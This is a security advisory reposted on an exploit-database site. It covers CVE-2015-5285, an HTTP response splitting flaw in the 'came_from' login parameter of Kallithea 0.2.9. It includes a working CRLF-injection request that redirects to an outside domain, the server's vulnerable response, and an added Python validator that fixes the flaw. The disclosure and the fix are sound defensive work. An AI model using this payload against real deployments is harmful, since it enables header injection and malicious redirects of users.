0day.today - Biggest Exploit Database in the World.
Kallithea 0.2.9 HTTP Response Splitting Vulnerability
Security Risk: Medium
Kallithea 0.2.9 (came_from) HTTP Response Splitting Vulnerability

Vendor: Kallithea
Product web page: https://www.kallithea-scm.org
Version affected: 0.2.9 and 0.2.2

Summary: Kallithea, a member project of Software Freedom Conservancy, is a GPLv3'd, Free Software source code management system that supports two leading version control systems, Mercurial and Git, and has a web interface that is easy to use for users and admins.

Desc: Kallithea suffers from an HTTP header injection (response splitting) vulnerability because it fails to properly sanitize user input before using it as an HTTP header value via the GET 'came_from' parameter in the login instance. This type of attack not only allows a malicious user to control the remaining headers and body of the response the application intends to send, but also allows them to create additional responses entirely under their control.

Tested on: Kali Python

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience

Advisory ID: ZSL-2015-5267
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5267.php
Vendor: https://kallithea-scm.org/news/release-0.3.html
Vendor Advisory: https://kallithea-scm.org/security/cve-2015-5285.html
CVE ID: 2015-5285
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5285

21.09.2015

--

GET /_admin/login?came_from=d47b5%0d%0aX-Forwarded-Host%3a%20http://zeroscience.mk%01%02%0d%0aLocation%3a%20http://zeroscience.mk HTTP/1.1
Host: 192.168.0.28:8080
Content-Length: 0
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://192.168.0.28:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.0.28:8080/_admin/login?came_from=%2F
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: kallithea=3090b35b3e37ba350d71b62c240c50bf87932f0d7e6b1a600cba4e0e890b7e29e253b438

###

HTTP/1.1 302 Found
Cache-Control: no-cache
Content-Length: 411
Content-Type: text/html; charset=UTF-8
Date: Mon, 21 Sep 2015 13:58:05 GMT
Location: http://192.168.0.28:8080/_admin/d47b5
X-Forwarded-Host: http://zeroscience.mk
Location: http://zeroscience.mk
Pragma: no-cache
Server: waitress

<html>
 <head>
  <title>302 Found</title>
 </head>
 <body>
  <h1>302 Found</h1>
  The resource was found at <a href="http://192.168.0.28:8080/_admin/d47b5
X-Forwarded-Host: http://zeroscience.mk
Location: http://zeroscience.mk">http://192.168.0.28:8080/_admin/d47b5
X-Forwarded-Host: http://zeroscience.mk
Location: http://zeroscience.mk</a>;
  you should be redirected automatically.
 </body>
</html>
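The fix on the application side is to validate the came_from value before it ever reaches a Location header. The Python below is an added example, not Kallithea's own code or part of the advisory: it rejects control characters (the CR/LF that split the response above) and also refuses absolute or protocol-relative targets, falling back to the application root. The function names and the sample inputs are this example's own.

```python
"""Validate a post-login redirect target before it becomes a Location header.

Added example (not Kallithea's code). 'raw' is the came_from query value as
it arrives, still percent-encoded; the return value is safe to place in a
Location header and stays on the same origin.
"""
from typing import List, Tuple
from urllib.parse import unquote, urlsplit

SAFE_DEFAULT = "/"  # where to send the user when came_from is unacceptable


def safe_came_from(raw: str) -> str:
    """Return a same-origin, header-safe path for 'raw', or SAFE_DEFAULT."""
    if not raw:
        return SAFE_DEFAULT
    target = unquote(raw)
    # Any C0 control byte or DEL is rejected before URL parsing: CR/LF would
    # terminate the header, and bytes like \x01\x02 never occur in a real path.
    # (Checked first because urlsplit silently strips tab/CR/LF.)
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in target):
        return SAFE_DEFAULT
    # Backslashes are treated as slashes by browsers; do not let them sneak
    # a host in via '/\evil'.
    if "\\" in target:
        return SAFE_DEFAULT
    parts = urlsplit(target)
    # Only a relative path on this origin is acceptable: no scheme, no host,
    # and no '//host' form, which a browser resolves to another origin.
    if parts.scheme or parts.netloc or not target.startswith("/"):
        return SAFE_DEFAULT
    return target


def redirect_headers(raw_came_from: str) -> List[Tuple[str, str]]:
    """Build the 302 header list; fail closed if any value could split it."""
    headers = [("Location", safe_came_from(raw_came_from)),
               ("Cache-Control", "no-cache")]
    # Defense in depth: no header value may ever contain a line break.
    for name, value in headers:
        if "\r" in value or "\n" in value:
            raise ValueError("refusing to emit header %r with a line break" % name)
    return headers


if __name__ == "__main__":
    # Constructed sample: the advisory's payload, then a benign value.
    print(safe_came_from("d47b5%0d%0aLocation%3a%20http://zeroscience.mk"))  # /
    print(safe_came_from("/myrepo/summary"))  # /myrepo/summary
```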